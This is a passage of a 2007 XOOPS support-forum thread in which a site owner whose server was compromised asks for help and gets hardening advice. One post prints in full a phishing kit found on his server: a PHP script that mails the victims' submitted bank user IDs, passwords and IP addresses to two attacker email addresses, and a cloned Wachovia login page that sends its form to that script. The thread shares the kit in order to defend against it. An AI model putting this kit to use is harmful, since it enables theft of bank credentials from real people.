21
wtravel
Re: Open holes and hacked

Quote:
if i did it in the XOOPS path /www where i have xoops's files, it will be correct ?

That is not correct, it will cause your XOOPS script to stop working and it will make your php files readable (so also mainfile.php, which contains sensitive data).

xgarb says in his post to place the .htaccess file with that code in your uploads folder.

22
dizzymarkus
Re: Open holes and hacked

Ok heres the skinny on how they are gaining access or so I believe.

For some reason they can gain access and get this uploaded which makes it own folder called "seite", once as "module" (instead of modules (9 i caught that one lol) and once an html file in he uploads directory. ( I have since adjusted permisions, changed account password, rechecked main_file.php and added the htaccess that was mentioned here.


I had a wierd file called modules.zip -- I downloaded and looked in it. It had two files --

1. LOGIN.PHP

<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>

$ip getenv("REMOTE_ADDR");
$message .= "------------------------------n";
$message .= "User ID: ".$_POST['userid']."n";
$message .= "Password: ".$_POST['password']."n";
$message .= "IP: ".$ip."n";
$message .= "-------Created By Palmers-------n";


$recipient "darkcrews@gmail.com,www.crew@gmail.com";
$subject "WaChoviA";
$headers "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
     if (
mail($recipient,$subject,$message,$headers))
       {
           
header("Location: http://www.wachovia.com");

       }
else
           {
         echo 
"ERROR! Please go back and try again.";
         }

?>


<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>



and an htm file called SERVICE.HTM

<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>


DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<
html xmlns="http://www.w3.org/1999/xhtml">
<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
meta http-equiv="Pragma" content="no-cache" />
<
meta http-equiv="Cache-Control" content="no-cache" />
<
meta http-equiv="Expires" content="Mon, 01 Jan 2001 13:00:00 GMT" />
<
title>Online Services Account Logintitle>
    <
link href="https://onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />
    <
link href="https://onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
    <
style type="text/css">@import url("/ols/css/interference.css");style>
    <
link href="https://onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />
    <
script type="text/javascript" language="JavaScript1.2" src="https://www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js">script>

<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/utility.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/messaging.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/login.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/bidata.js">script>
<
script type="text/javascript" language="JavaScript">

script>
head>
<
body id="default" class="twocol login" onunload="passReset();enableSubmits();">

<
form method="post" action="/auth/AuthService" name="dualForm" id="dualForm" onsubmit="return disableSubmits();">
    <
input type="hidden" name="action" value="presentLogin" />
    <
input type="hidden" name="credtype" value="DUAL" />
        <
input type="hidden" name="credtype" value="UID" />
form>
<
div id="limiter">
<
div id="header"><img src="https://onlineservices.wachovia.com/ols/images/logo.gif" alt="Wachovia Logo" width="240" height="52" id="logo" /><script type="text/javascript" language="JavaScript">setBrand();script>
        <
img src="https://onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" width="246" height="21" id="subbrand" />
    div>
    <
div id="pusher">
        <
div id="content">
            <
div id="main">                
                <
h1>Online Services Loginh1>                
                <
div id="details">        
                <
p>Enter the appropriate login information below, and select your service.p>                
                div>                    
                <
ul>
                <
li>Retirement Plan Participants: <a href="https://commercial.wachovia.com/Online/Financial/Business/Service?action=wrsLogin">Logina>li>
                ul>                
                <
form method="post" action="login.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return disableSubmits();">
        <
input type="hidden" name="credtype" value="UID" />
                <
input type="hidden" value="uidLogin" name="action" />
                <
input type="hidden" value="" name="bi" />
                <
input type="hidden" value="" name="requestTimestamp" />
                <
table border="0" cellpadding="0" cellspacing="0" class="formtable">
                <
tr>
                    <
td class="colgutter">td>
                    <
td class="label"><label for="userid">User IDlabel>
                    <
td class="colgutter">td>
                    <
td><input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="1">td>
                tr>
                <
tr>
                    <
td colspan="3">td>
                    <
td>
                        <
label for="rememberuid" class="nestinput"><input type="checkbox" name="rememberuid" id="rememberuid" tabindex="6" />Remember my User IDlabel>&nbsp;&nbsp;&nbsp;
                        <
a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/remember_my_user_id.htm')" tabindex="7" >Learn Morea>
                    td>
                tr>
                <
tr>
                    <
td>td>
                    <
td class="label" nowrap="nowrap"><label for="password">Passwordlabel>td>
                    <
td class="colgutter">td>
                    <
td><input type="password" name="password" id="password" autocomplete="off" value="" tabindex="2" />td>
                tr>
                <
tr><td>td><td>td><td>td><td><div class="format">Case Sensitivediv>td>tr>                
                <
tr>
                    <
td>td>
                    <
td class="label" nowrap="nowrap"><label for="service">Service Selectionlabel>td>
                    <
td class="colgutter">td>
                    <
td>
                    <
select name="systemtarget"  width="160" onchange="getValue(this.form.name);" tabindex="3">
                        <
option value="gotoOSH">Choose a service...option>
                        <
option value="gotoOSH">Online Services Homeoption>
                        <
option value="gotoBanking">Online Bankingoption>
                        <
option value="gotoBillPay">Online BillPayoption>
                        <
option value="gotoBrokerage">Online Brokerageoption>
                    select>
                    td>
                tr>                
                <
tr>
                    <
td colspan="4" class="center">
                    
                    <
input type="submit" value="Login" tabindex="4" class="button w80" id="submitButton" name="submitButton">
                    td>
                tr>
                table>
                form>
            div>
            <
div id="related" class="clear">
                <
div class="box">
                    <
h2><span>Customer Servicespan>h2>
                    <
h3>h3>
                    <
ul>
                        <
li><a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/user_id_and_password_rules.htm')">User ID &ampPassword Helpa>li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=USERIDLOOKUP&credtype=UID">Forgot your User ID?a>li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=/auth/AuthService&credtype=UID">Reset your Passworda>li>
                    ul>
                    
                    <
h3>h3>
                    <
ul class="small">
                        <
li>Customer Access Number: <a href="#" onclick="return submitForm('dualForm');">Logina>li>
                    ul>                    
                div>
                <
div id="promo">
                <
script type="text/javascript" language="JavaScript">
                
                
script>
                div>
            div>
            <
hr class="textonly" />
            <
div id="navigation" class="blue">
                <
h2 class="ir">Navigationh2>                
                <
div id="utilities" class="utility">div>        
                <
div id="global" class="utility">
                    <
ul>                    
                        <
li class="first" id="officelocator"><a href="http://www.wachoviasec.com/home/locator.asp" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locatora>li>
                        <
li class="first" id="locations"><a href="http://wachovia.via.infonow.net/locator/?src=OLB" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Locationsa>li>
                    ul>                    
                div>
            div>
        div>
    div>
    <
hr class="textonly" />
    <
div id="footer">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="http://www.wachovia.com/popup/agreement/" target="popupwin" onclick="return popWinStnd(this.href);">Customer Agreementa>li>
            <
li><a href="http://www.wachovia.com/popup/privacy/" target="popupwin" onclick="return popWinStnd(this.href);">Privacya>li>
            <
li><a href="http://www.wachovia.com/popup/security/" target="popupwin" onclick="return popWinStnd(this.href);">Securitya>li>
            <
li><a href="http://www.wachovia.com/popup/legal/" target="popupwin" onclick="return popWinStnd(this.href);">Legala>li>
        ul>
        <
div id="copyright">&copy2007 Wachovia CorporationAll rights reserved.div>
    div>
    <
div id="footeralt">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="https://wachseconline.wachovia.com/LD_Privacy.html" target="popupwin" onclick="return popWinStnd(this.href);">Privacya>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Security.html" target="popupwin" onclick="return popWinStnd(this.href);">Securitya>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_AccessOnlineAgree.html" target="popupwin" onclick="return popWinStnd(this.href);">Legal Disclosuresa>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Contact.html" target="popupwin" onclick="return popWinStnd(this.href);">Contact Usa>li>
        ul>
        <
div id="copyright">&copy2007 Wachovia SecuritiesLLC (member NYSE/SIPC)div>
        <
table id="notmay">
        <
caption>Securities and Insurance Products:<caption>
        <
tr>
            <
td>Not Insured by FDIC or any<br />Federal Government Agencytd>
            <
td>May Lose<br />Valuetd>
            <
td>Not a Deposit of or Guaranteed by<br />a Bank or any Bank affiliatetd>
        tr>
        table>
        <
div id="disclosure">
        <
p>Wachovia Securities is the trade name used by two separateregistered broker-dealers and non-bank affiliates of 
        Wachovia Corporation providing certain retail securities brokerage services
Wachovia SecuritiesLLCmember 
        NYSE
/SIPC, and Wachovia Securities Financial NetworkLLCmember <span class="small">NASDspan>/SIPC.  Accounts 
        carried by First Clearing
LLCmember NYSE/SIPC.p>
        <
p>Insurance products are offered through non-bank affiliates of Wachovia Corporation and are underwritten by unaffiliated 
        insurance companies
.p>
        div>
    div>
div>
<
script language="JavaScript">

script>


<script type="text/javascript" language="JavaScript" id="_hbc">

script>
<
script type="text/javascript" language="JavaScript1.1" defer="defer" src="https://www.wachovia.com/metrics/stats.js">script>






<
script language="JavaScript">
var 
axel Math.random()+"";
var 
axel 10000000000000;
document.write(''?" width="1" height="1" border="0">');
script>
<
noscript>
<
img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">
noscript>

body>
html>


<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>


I would appreciate any help given in how to stop this -- apparently I have a three strike rule with my host and I will be asked to go to another server. :0(


Thank you,
Markus

23
dizzymarkus
Re: Open holes and hacked

BUMP.............................

Anyone please?


Thank you
Markus

24
skenow
Re: Open holes and hacked
  • 2007/6/14 1:39

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

dizzymarkus wrote:
Ok heres the skinny on how they are gaining access or so I believe.



How they gain access is still the question. The rest of your post is what they do after they get access.

Where do the folders and files reside? In /uploads or the root?

Shared servers and anonymous ftp access are the biggest possibilities someone has for gaining access - both the responsibilities of your host to secure, imho.

25
vaughan
Re: Open holes and hacked
  • 2007/6/14 7:01

  • vaughan

  • Friend of XOOPS

  • Posts: 680

  • Since: 2005/11/26


btw, you should send that modules.zip & relevant info to googlemail abuse.

report the email addresses used in the script ( $recipient = "darkcrews@gmail.com, http://www.crew@gmail.com";
)which are gmail addresses. google will then look at the script and determine that they are using gmails service illegally and close their accounts. they may also begin a criminal investigation if they think it's warranted, as they are in their rights to do so.

26
Peekay
Re: Open holes and hacked
  • 2007/6/14 8:45

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Quote:

xgarb wrote:

Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi 
Options 
-ExecCGI



If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.
A thread is for life. Not just for Christmas.

27
dizzymarkus
Re: Open holes and hacked

My bad on the gaining access wording -- lol I was thinking how the "" did they get in while I was typing it :0( SORRY


This has happened three times -- only once has a folder been in the uploads directory the other two it was in the root.( I also added the htaccess in the meantime)

Thank you for the google abuse tip -- I will send it out today to them. :0)

Still am afraid to reopen the site as this is the third strike with my hosting.It happenes again they are gonna lock my account.I never had a problem with previous versions of XOOPS in the last 2 years until now. I even email that person and told them there is no bank info on a free site and nothing is sold -- please remove me from your phishing list. They actually had the balls to return my email with a note "THANKS FOR THE INFO" and thats it. Thanks for all the help you guys are giving.

Markus

28
Peekay
Re: Open holes and hacked
  • 2007/6/14 9:54

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Now that you know they are using a valid email address, you should (as Vaughn suggested) complain to Google Mail. Although if Google do decide to take action against the account holder they would have to be quick. I would imagine that dynamic IP addresses make it impossible for Google to block future registrations and the hackers may set up a different g-mail account every week.

If your web root is compromised, it may actually be the host's fault, not yours. An exploit utilising PhpBB was the source of widespread hacks on shared servers a couple of years ago. You didn't need to be running PhpBB on your site to get hacked.

@moderator
Can someone trim the wide code in one of the above posts so this thread is more readable.
A thread is for life. Not just for Christmas.

29
debianus
Re: Open holes and hacked
  • 2007/6/14 10:07

  • debianus

  • Not too shy to talk

  • Posts: 179

  • Since: 2006/12/17


Quote:

Peekay wrote:

If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.


I agreed; it would be a pity that this wonderful tip to be lost in the forums.
I had posted it in spanish support; other locals support could do it too.

30
Dave_L
Re: Open holes and hacked
  • 2007/6/14 10:52

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


[/quote]Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi 
Options 
-ExecCGI

[/quote]

What exactly does this do? I've read the Apache documentation, but don't fully understand it.

Login

Who's Online

287 user(s) are online (179 user(s) are browsing Support Forums)


Members: 0


Guests: 287


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits